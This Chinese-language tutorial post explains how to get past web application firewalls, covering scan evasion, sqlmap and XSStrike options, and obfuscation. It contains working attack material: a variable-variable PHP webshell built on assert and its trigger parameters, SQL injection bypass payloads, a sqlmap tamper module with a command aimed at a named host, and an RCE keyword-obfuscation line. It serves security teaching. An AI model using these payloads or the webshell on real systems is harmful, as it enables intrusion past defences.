《Web安全基础》09. WAF 绕过


本系列侧重方法论,各工具只是实现目标的载体。
命令与工具只做简单介绍,其使用另见《安全工具录》。

1:基本概念

1.1:DoS & DDos

DoS(Denial of Service),通过发送大量请求等方式耗尽目标资源,使目标系统服务不可用。由单一攻击者或单一设备发起。

DDoS(Distributed Denial of Service Attack),与 DoS 类似,通过超载目标系统使其服务不可用。DDoS 涉及多个攻击者或僵尸机共同协作来攻击目标。

DoS 与 DDos 攻击的目标主要是系统主机。

1.2:CC 攻击

CC 攻击(Challenge Collapsar),一种特定类型的 DoS 攻击,攻击目标通常是 Web 服务器,如网站或 Web 应用程序。

CC 攻击的目标通常是网站或 Web 应用程序。

1.3:扫描绕过方式

扫描目标如果过快,可能会触发目标防火墙的流量检测拦截。

绕过思路,模拟正常请求的访问习惯:

  • 更改请求方式
    更改请求方式去请求数据。例如:HEAD 方式改为 GET 方式请求数据。

  • 模拟用户请求
    将扫描工具所提交的数据包尽可能的伪装成用户使用浏览器访问所提交的数据包。包括消除工具指纹。

  • 模拟爬虫引擎
    WAF 上有爬虫黑白名单机制。可通过修改 User-Agent 头模拟爬虫。

  • 代理池技术
    使用代理池,通过代理服务器扫描目标。可以实现每次请求更换源 ip,避免拦截。

  • 延时扫描
    降低扫描频率与速度。

2:WAF 绕过

WAF 拦截会出现在安全测试的各个层面,掌握各个层面的分析和绕过技术最为关键。

WAF 绕过层面:

  • 信息收集
  • 漏洞发现
  • 漏洞利用
  • 权限控制

2.1:信息收集阶段

在这里插入图片描述

一个网站目录扫描脚本:

# 搜索引擎爬虫模拟及模拟真实用户
import requests
import time

headers = {
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    # 模拟用户 Kit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
    # 模拟引擎 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
    # 更多爬虫引擎:https://www.cnblogs.com/iack/p/3557371.html
    'User-Agent': 'Mozilla/5.0 (compatible; Baiduspider-render/2.0;'
                  ' +http://www.baidu.com/search/spider.html)',
    'Sec-Fetch-Dest': 'document',
    'Accept':
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/si'
    'gned-exchange;v=b3;q=0.9',
    'Sec-Fetch-Site': 'none',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
    'Cookie': 'xxx',  # 根据当前访问 cookie
}

for paths in open('dict.txt', encoding='utf-8'):
    url = 'http://192.168.0.103:8081/'
    paths = paths.replace('\n', '')
    urls = url + paths

    # 如需测试加代理,或加入代理池需加代理
    proxy = {
        'http': '127.0.0.1:7777'
    }

    try:
        code = requests.get(urls, headers=headers, verify=False).status_code
        print(urls + '|' + str(code))
    except Exception as err:
        print('connecting error')

    # time.sleep(3)  # 模拟用户需延时(请求速度)

写脚本的原因是为了模拟用户真实的访问情况,并且可以对其有充足的控制,现有工具可能会有无法更改的请求内容。

相关资源:

《各大搜索引擎的User-Agent》
https://www.cnblogs.com/iack/p/3557371.html

2.2:漏洞发现阶段

在这里插入图片描述

相关资源:

A simple HTTP Request & Response Service - httpbin
http://httpbin.org

快代理
https://www.kuaidaili.com

proxy_pool
https://github.com/jhao104/proxy_pool

2.3:权限控制阶段

在这里插入图片描述

在权限控制阶段,对于后门代码命令的传输,可采取以下方式绕过 WAF:

  • 密码混淆
  • 变量覆盖
  • 异或混淆

除此以外,因为很多权限工具都被 WAF 识别了相关特征(如菜刀、蚁剑、冰蝎等),导致无法使用控制工具,这时就需要自己写工具。

相关资源:

Behinder
https://github.com/rebeyond/Behinder

AntSword
https://github.com/AntSwordProject/antSword

2.3.1:密码混淆

后门直接调用 system()phpinfo() 等敏感字段时会被 WAF 拦截。在绕过时,就需要配合截断(%00)或者相关密码技术处理。

例如 PHP 中的函数:

  • Base64 编解码
    • base64_encode($data)
    • base64_decode($base64string)
  • URL 编解码
    • urlencode($string)
    • urldecode($string)

2.3.2:变量覆盖

变量覆盖(可变变量),用于通过变量的值来动态命名变量并访问其值。

以 PHP 为例,$$a 是一种特殊的变量语法,用来实现变量覆盖:

$foo = 'bar';
$bar = 'Hello, World!';

// 使用 $$foo 来访问 $bar 的值
// 因为 $foo 的值是 'bar' ,所以 $$foo 实际上等同于 $bar 
// 最终输出 'Hello, World!' 。
echo $$foo;

示例

一个运用此原理的 PHP 后门(设后门文件为 webshell.php):

<?php
    $a = $_GET['x']; 
    $$a = $_GET['y']; 
    $b($_POST['z']); 
?>

利用:

# get 传参:
url + webshell.php?x=b&y=assert  
# 这样赋值后 $a=b, $$a=$b=assert
# 所以变为了 assert($_POST[‘z’]);
# 再通过 post 传递 payload 即可

# post 传参:
z=phpinfo();

2.3.2:异或混淆

异或混淆,基于异或运算(XOR,Exclusive OR)。一种编码技术,通常用于对数据进行保护或混淆,使其难以理解。

相关工具与资源:

PHP 混淆加密脚本
https://github.com/djunny/enphp

在线 PHP 加密
https://phpjiami.com/phpjiami.html

异或加密 Webshell-venom
https://github.com/yzddmr6/as_webshell_venom

2.4:漏洞利用阶段

漏洞利用要注意相关工具扫描利用时绕过防火墙。对于 payload 也需要做绕过。

2.4.1:SQL 注入

手工注入绕过

 - 对敏感字符,使用注释(/**/)绕过
 - %23 代表 #
 - %0A 代表换行符 union %23a%0Aselect 1,2,3;%23 如:

示例:

id=-1%20union %23a%0Aselect 1,2,3;%23 

id=-1/**&id=-1%20 union%20 select%201,2,3%23*/ id=-1%20union/*!44509select*/%201,2,3

# mysql 特性:
# /*!x*/ 代表当 mysql 数据库版本大于 x 时,
# mysql 不再将其当作注释,从而将其运行。

SQLmap 工具绕过

 · 绕过指纹识别

	需要伪装 UA:
	--user-agent="Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
	或者使用 --random-agent,
	或者修改 sqlmap.conf 文件下的 agent。

 · 通过自写模块绕过敏感字段

	--tamper=xxx.py

 · 使用代理池绕过 CC 防护 

	--proxy=http:/IP:port

模块示例:

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""


from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def tamper(payload,**kwargs):
    retVal =""
    if payload:
        payload = payload.replace("union","%23a%0aunion")
        payload = payload.replace("select","/*!4457select*/")
        payload = payload.replace("%20","%23a%0a")
        payload = payload.replace(" ","%23a%0a")
        payload = payload.replace("database()","database%23a%0a()")
    return payload
sqlmap.py -u "http://test.xiaodi8.com/sqlilabs/Less-2/?id=1" --proxy="http:tps123.kdlapi.com:15818" --tamper="waf-dog.py" --random-agent

2.4.2:文件上传

  • 数据溢出
  • 符号变异
  • 分号绕过
  • 换行绕过
  • 重复数据
  • %00 截断
  • 其他特性绕过

2.4.3:XSS

手工 XSS 绕过

  • 标签语法替代
  • 特殊符号干扰
  • 提交方式更改
  • 垃圾数据溢出
  • 加密解密算法
  • 结合其它漏洞绕过

XSStrike 工具绕过

  • 使用延时(--timeout)或者代理池(--proxy)绕过

2.4.4:RCE

 · 编解码绕过 

	base64,url 编码。
	注意:可变变量中传入 base64_decode() 函数可能会被拦截,
	此时就需要采用其他方式。

 · 关键字绕过 

	如 phpinfo();
	可以替换成如下写法:
	$y=str_replace('x','','pxhpxinxfo()');assert($y);

 · 变量覆盖

	参考【2.3.2:变量覆盖】。

得其所利,必虑其所害;乐其所成,必顾其所败。

——《说苑》(两汉)刘向

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值